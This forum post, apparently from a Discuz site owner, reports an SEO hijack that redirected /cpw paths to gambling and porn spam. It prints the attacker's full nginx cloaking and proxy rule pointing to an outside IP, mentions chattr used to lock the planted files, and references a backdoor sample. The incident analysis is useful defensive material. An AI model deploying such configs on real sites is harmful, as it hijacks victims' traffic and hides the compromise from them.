[backcolor=rgb(255, 237, 196)][font=微软雅黑, "]/cpw开头的任意路径 被快照劫持为非法彩票、赌博、黄网等,
利用伪静态定向蜘蛛引流 [color=rgb(0, 0, 0)][backcolor=rgb(255, 237, 196)][font=微软雅黑, "]访问/cpw*目录
[backcolor=rgb(255, 237, 196)][font=微软雅黑, "]改了一个配置文件,创建了一个配置文件
[color=rgb(0, 0, 0)][backcolor=rgb(255, 237, 196)][font=微软雅黑, "]robots.txt
[backcolor=rgb(255, 237, 196)][font=微软雅黑, "]chattr 阻止删除植入文件
文件名discuz.conf
[backcolor=rgb(255, 237, 196)][font=微软雅黑, "]除了在discuz.conf里写了规则,还在主机的conf文件里也写了规则
[backcolor=rgb(255, 237, 196)][font=微软雅黑, "]程序生成的tid都是8位以上
内容如下:
location ^~/cpw {
access_log off;
index index.html index.htm index.php;
if ($http_referer ~* \"toutiao.baidu.com|m.toutiao.baidu.com\"){
return 404;
}
if ($remote_addr ~ (110.184.|117.28.|118.114.|120.239.|125.70|27.154.|182.139)) {
return 404;
}
if ($http_x_forwarded_for ~ (110.184.|117.28.|118.114.|120.239.|125.70|27.154.|182.139)) {
return 404;
}
set $flag 0;
if ($http_user_agent ~* (Baiduspider)) {
set $flag 1;
}
if ($http_referer ~* (m.baidu.com|wap.baidu.com|3g.baidu.com|m5.baidu.com)){
set $flag 1;
}
if ($flag = 0) {
return 404;
}
proxy_pass http://107.151.93.122:86/ttysq.com/cpw/;
proxy_redirect http://107.151.93.122:86/ttysq.com/cpw/ http://www.ttysq.com;
proxy_connect_timeout 60;
proxy_read_timeout 60;
proxy_send_timeout 60;
proxy_buffer_size 32k;
proxy_buffers 4 32k;
proxy_busy_buffers_size 64k;
proxy_temp_file_write_size 1024m;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}后门源文件内容:
本部分内容设定了隐藏,需要回复后才能看到
后门样本:
a.rar
